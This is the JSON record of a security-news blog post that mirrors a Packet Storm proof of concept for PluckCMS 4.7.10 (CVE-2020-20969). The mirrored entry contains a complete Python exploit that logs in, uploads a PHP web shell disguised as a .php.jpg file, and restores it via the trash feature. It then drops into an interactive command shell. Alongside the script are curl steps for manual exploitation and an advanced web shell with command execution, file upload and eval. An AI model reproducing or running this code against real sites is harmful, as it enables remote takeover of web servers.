{"id":41045,"date":"2026-02-16T11:45:45","date_gmt":"2026-02-16T11:45:45","guid":{"rendered":"http:\/\/localhost\/?p=41045"},"modified":"2026-02-16T11:45:45","modified_gmt":"2026-02-16T11:45:45","slug":"pluckcms-4710-shell-upload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41045","title":{"rendered":"\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload_PACKETSTORM:215639"},"content":{"rendered":"

{“lastseen”:”2026-02-16T17:13:25″,”description”:”PluckCMS version 4.7.10 remote shell upload proof of concept exploit…”,”published”:”2026-02-16T00:00:00″,”modified”:”2026-02-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215639″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2020-20969″],”sourceData”:”=============================================================================================================================================\\n | # Title : PluckCMS 4.7.10 Unrestricted File Upload RCE |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/github.com\/pluck-cms\/pluck\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212393\/ \\u0026 \\tCVE-2020-20969\\n \\n [+] Summary : The trash restoration functionality (\/admin.php?action=trash_restoreitem) fails to properly validate file extensions when restoring files from the trash directory, \\n allowing attackers to restore malicious PHP files with double extensions (e.g., .php.jpg) that were previously uploaded to the system.\\t\\t\\t \\n \\t\\t\\t \\n [+] POC : python poc.py\\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import sys\\n import time\\n import os\\n from urllib.parse import urljoin\\n \\n class PluckCMSExploit:\\n def __init__(self, target_url, username, password):\\n self.target_url = target_url.rstrip(‘\/’)\\n self.session = requests.Session()\\n self.username = username\\n self.password = password\\n \\n def login(self):\\n \\”\\”\\”Login to PluckCMS admin panel\\”\\”\\”\\n login_url = urljoin(self.target_url, ‘\/admin.php’)\\n \\n # First get the login page to obtain any required tokens\\n print(\\”[*] Getting login page…\\”)\\n response = self.session.get(login_url)\\n \\n # Prepare login data (adjust field names based on actual form)\\n login_data = {\\n ‘cont1’: self.username,\\n ‘cont2’: self.password,\\n ‘submit’: ‘Log in’\\n }\\n \\n print(f\\”[*] Attempting login as {self.username}…\\”)\\n response = self.session.post(login_url, data=login_data)\\n \\n # Check if login was successful\\n if ‘admin.php’ in response.url and ‘action=page’ in response.text:\\n print(\\”[+] Login successful!\\”)\\n return True\\n else:\\n print(\\”[-] Login failed!\\”)\\n return False\\n \\n def upload_malicious_file(self):\\n \\”\\”\\”Upload a file with double extension (.php.jpg)\\”\\”\\”\\n upload_url = urljoin(self.target_url, ‘\/admin.php?action=files’)\\n \\n # Create a malicious PHP file with backdoor\\n php_shell = \\”\\”\\”\\u003c?php\\n if(isset($_GET[‘cmd’])) {\\n system($_GET[‘cmd’]);\\n } else {\\n echo \\”PluckCMS RCE – CVE-2020-20969\\”;\\n }\\n ?\\u003e\\”\\”\\”\\n \\n # Write to local file first\\n with open(‘exploit.php.jpg’, ‘w’) as f:\\n f.write(php_shell)\\n \\n # Prepare the upload\\n files = {\\n ‘uploadfile’: (‘exploit.php.jpg’, open(‘exploit.php.jpg’, ‘rb’), ‘image\/jpeg’)\\n }\\n \\n data = {\\n ‘sendfile’: ‘Upload’\\n }\\n \\n print(\\”[*] Uploading malicious file (exploit.php.jpg)…\\”)\\n response = self.session.post(upload_url, files=files, data=data)\\n \\n # Clean up local file\\n os.remove(‘exploit.php.jpg’)\\n \\n if ‘exploit.php.jpg’ in response.text:\\n print(\\”[+] File uploaded successfully!\\”)\\n return True\\n else:\\n print(\\”[-] File upload failed!\\”)\\n return False\\n \\n def move_to_trash(self):\\n \\”\\”\\”Move the file to trash (simulate user action)\\”\\”\\”\\n # This would normally be done through the admin interface\\n # For the PoC, we’ll assume the file is in trash\\n print(\\”[*] Note: You need to move ‘exploit.php.jpg’ to trash via admin interface\\”)\\n print(\\”[*] Or ensure it exists in data\/trash\/files\/ directory\\”)\\n return True\\n \\n def exploit_trash_restore(self):\\n \\”\\”\\”Exploit the trash restoration vulnerability\\”\\”\\”\\n exploit_url = urljoin(self.target_url, ‘\/admin.php?action=trash_restoreitem\\u0026var1=exploit.php.jpg\\u0026var2=file’)\\n \\n print(\\”[*] Exploiting trash restoration vulnerability…\\”)\\n response = self.session.get(exploit_url)\\n \\n if response.status_code == 200:\\n print(\\”[+] Trash restoration successful!\\”)\\n \\n # Verify the file was restored\\n check_url = urljoin(self.target_url, ‘\/files\/exploit_copy.php’)\\n response = self.session.get(check_url)\\n \\n if ‘PluckCMS RCE’ in response.text:\\n print(\\”[+] Exploit confirmed! File accessible at:\\”)\\n print(f\\” {check_url}\\”)\\n return True\\n return False\\n \\n def execute_command(self, command):\\n \\”\\”\\”Execute a command on the target\\”\\”\\”\\n cmd_url = urljoin(self.target_url, f’\/files\/exploit_copy.php?cmd={command}’)\\n \\n print(f\\”[*] Executing command: {command}\\”)\\n response = self.session.get(cmd_url)\\n \\n if response.status_code == 200:\\n print(\\”[+] Command output:\\”)\\n print(response.text.strip())\\n return response.text\\n return None\\n \\n def run(self):\\n \\”\\”\\”Run the complete exploit chain\\”\\”\\”\\n print(\\”[*] PluckCMS 4.7.10 – Unrestricted File Upload RCE (CVE-2020-20969)\\”)\\n print(f\\”[*] Target: {self.target_url}\\”)\\n \\n # Step 1: Login\\n if not self.login():\\n return\\n \\n # Step 2: Upload malicious file\\n if not self.upload_malicious_file():\\n print(\\”[-] Upload failed. Continuing with assumption file exists…\\”)\\n \\n # Step 3: User needs to move file to trash manually\\n self.move_to_trash()\\n \\n input(\\”[*] Press Enter after moving exploit.php.jpg to trash via admin panel…\\”)\\n \\n # Step 4: Exploit trash restoration\\n if self.exploit_trash_restore():\\n # Step 5: Test command execution\\n print(\\”\\\\n[*] Testing command execution…\\”)\\n self.execute_command(‘whoami’)\\n self.execute_command(‘pwd’ if ‘linux’ in sys.platform else ‘dir’)\\n \\n # Interactive shell\\n print(\\”\\\\n[+] Interactive shell mode (type ‘exit’ to quit)\\”)\\n while True:\\n cmd = input(\\”shell\\u003e \\”).strip()\\n if cmd.lower() in [‘exit’, ‘quit’]:\\n break\\n if cmd:\\n self.execute_command(cmd)\\n else:\\n print(\\”[-] Exploit failed. Possible reasons:\\”)\\n print(\\” – File not in trash directory\\”)\\n print(\\” – Different file naming\\”)\\n print(\\” – Already patched\\”)\\n \\n # Manual exploitation using curl commands\\n def manual_exploit_curl():\\n \\”\\”\\”Manual exploitation steps using curl\\”\\”\\”\\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”MANUAL EXPLOITATION WITH CURL\\”)\\n print(\\”=\\”*60)\\n \\n manual_steps = \\”\\”\\”\\n STEP 1: Login and get session cookie\\n ————————————\\n curl -c cookies.txt -X POST {target}\/admin.php \\\\\\\\\\n -d \\”cont1=admin\\u0026cont2=password\\u0026submit=Log+in\\”\\n \\n STEP 2: Upload malicious file (if needed)\\n —————————————–\\n curl -b cookies.txt -X POST {target}\/admin.php?action=files \\\\\\\\\\n -F \\”uploadfile=@exploit.php.jpg\\” \\\\\\\\\\n -F \\”sendfile=Upload\\”\\n \\n STEP 3: Exploit trash restoration\\n ———————————\\n curl -b cookies.txt \\\\\\\\\\n \\”{target}\/admin.php?action=trash_restoreitem\\u0026var1=exploit.php.jpg\\u0026var2=file\\”\\n \\n STEP 4: Execute commands\\n ————————\\n curl \\”{target}\/files\/exploit_copy.php?cmd=id\\”\\n \\n STEP 5: Clean up\\n —————-\\n curl -b cookies.txt \\\\\\\\\\n \\”{target}\/admin.php?action=files\\u0026var=exploit_copy.php\\u0026action2=delete\\”\\n \\”\\”\\”.format(target=\\”http:\/\/target.com\\”)\\n \\n print(manual_steps)\\n \\n # Web shell content\\n def generate_webshell():\\n \\”\\”\\”Generate a more advanced web shell\\”\\”\\”\\n advanced_shell = \\”\\”\\”\\u003c?php\\n \/\/ PluckCMS CVE-2020-20969 Web Shell\\n error_reporting(0);\\n echo \\”\\u003cpre\\u003e\\”;\\n \\n \/\/ Command execution\\n if(isset($_GET[‘cmd’])) {\\n system($_GET[‘cmd’]);\\n }\\n \\n \/\/ File upload\\n if(isset($_FILES[‘file’])) {\\n move_uploaded_file($_FILES[‘file’][‘tmp_name’], $_FILES[‘file’][‘name’]);\\n echo \\”File uploaded!\\”;\\n }\\n \\n \/\/ PHP code execution\\n if(isset($_POST[‘code’])) {\\n eval($_POST[‘code’]);\\n }\\n \\n \/\/ Show upload form\\n echo ‘\\n \\u003cform method=\\”POST\\” enctype=\\”multipart\/form-data\\”\\u003e\\n \\u003cinput type=\\”file\\” name=\\”file\\”\\u003e\\n \\u003cinput type=\\”submit\\” value=\\”Upload\\”\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cform method=\\”POST\\”\\u003e\\n \\u003ctextarea name=\\”code\\” rows=\\”10\\” cols=\\”80\\”\\u003e\\u003c\/textarea\\u003e\\u003cbr\\u003e\\n \\u003cinput type=\\”submit\\” value=\\”Execute PHP\\”\\u003e\\n \\u003c\/form\\u003e\\n ‘;\\n echo \\”\\u003c\/pre\\u003e\\”;\\n ?\\u003e\\”\\”\\”\\n \\n # Save the web shell\\n with open(‘webshell.php.jpg’, ‘w’) as f:\\n f.write(advanced_shell)\\n print(\\”[+] Advanced web shell saved as ‘webshell.php.jpg’\\”)\\n return advanced_shell\\n \\n if __name__ == \\”__main__\\”:\\n if len(sys.argv) != 4:\\n print(\\”Usage: python3 pluck_exploit.py \\u003ctarget_url\\u003e \\u003cusername\\u003e \\u003cpassword\\u003e\\”)\\n print(\\”Example: python3 pluck_exploit.py http:\/\/localhost\/pluck admin admin123\\”)\\n print(\\”\\\\nExample manual steps:\\”)\\n manual_exploit_curl()\\n \\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”QUICK MANUAL METHOD:\\”)\\n print(\\”=\\”*60)\\n print(\\”\\”\\”\\n 1. Login to admin panel\\n 2. Upload a file named ‘exploit.php.jpg’ with this content:\\n \\u003c?php system($_GET[‘cmd’]); ?\\u003e\\n \\n 3. Move the file to trash via admin interface\\n \\n 4. Send this request (replace PHPSESSID with your session):\\n GET \/admin.php?action=trash_restoreitem\\u0026var1=exploit.php.jpg\\u0026var2=file\\n \\n 5. Access your shell:\\n http:\/\/target\/files\/exploit_copy.php?cmd=id\\n \\”\\”\\”)\\n \\n # Ask if user wants to generate a web shell\\n if input(\\”\\\\nGenerate web shell file? (y\/n): \\”).lower() == ‘y’:\\n generate_webshell()\\n \\n sys.exit(1)\\n \\n target = sys.argv[1]\\n username = sys.argv[2]\\n password = sys.argv[3]\\n \\n exploit = PluckCMSExploit(target, username, password)\\n exploit.run()\\n \\n \\t\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215639″,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215639\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-16T17:13:25″,”description”:”PluckCMS version 4.7.10 remote shell upload proof of concept exploit…”,”published”:”2026-02-16T00:00:00″,”modified”:”2026-02-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215639″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2020-20969″],”sourceData”:”=============================================================================================================================================\\n | # Title : PluckCMS 4.7.10 Unrestricted File Upload RCE |\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-41045","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload_PACKETSTORM:215639 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41045\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload_PACKETSTORM:215639 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-16T17:13:25″,”description”:”PluckCMS version 4.7.10 remote shell upload proof of concept exploit…”,”published”:”2026-02-16T00:00:00″,”modified”:”2026-02-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215639″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2020-20969″],”sourceData”:”=============================================================================================================================================n | # Title : PluckCMS 4.7.10 Unrestricted File Upload RCE |n...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41045\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-16T11:45:45+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41045#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41045\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload_PACKETSTORM:215639\",\"datePublished\":\"2026-02-16T11:45:45+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41045\"},\"wordCount\":1631,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.2\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41045#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41045\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41045\",\"name\":\"\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload_PACKETSTORM:215639 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-16T11:45:45+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41045#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41045\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41045#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload_PACKETSTORM:215639\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload_PACKETSTORM:215639 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41045","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload_PACKETSTORM:215639 - zero redgem","og_description":"{“lastseen”:”2026-02-16T17:13:25″,”description”:”PluckCMS version 4.7.10 remote shell upload proof of concept exploit…”,”published”:”2026-02-16T00:00:00″,”modified”:”2026-02-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215639″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2020-20969″],”sourceData”:”=============================================================================================================================================n | # Title : PluckCMS 4.7.10 Unrestricted File Upload RCE |n...","og_url":"https:\/\/zero.redgem.net\/?p=41045","og_site_name":"zero redgem","article_published_time":"2026-02-16T11:45:45+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41045#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41045"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload_PACKETSTORM:215639","datePublished":"2026-02-16T11:45:45+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41045"},"wordCount":1631,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.2","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41045#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41045","url":"https:\/\/zero.redgem.net\/?p=41045","name":"\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload_PACKETSTORM:215639 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-16T11:45:45+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41045#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41045"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41045#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload_PACKETSTORM:215639"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41045","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41045"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41045\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41045"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41045"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41045"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}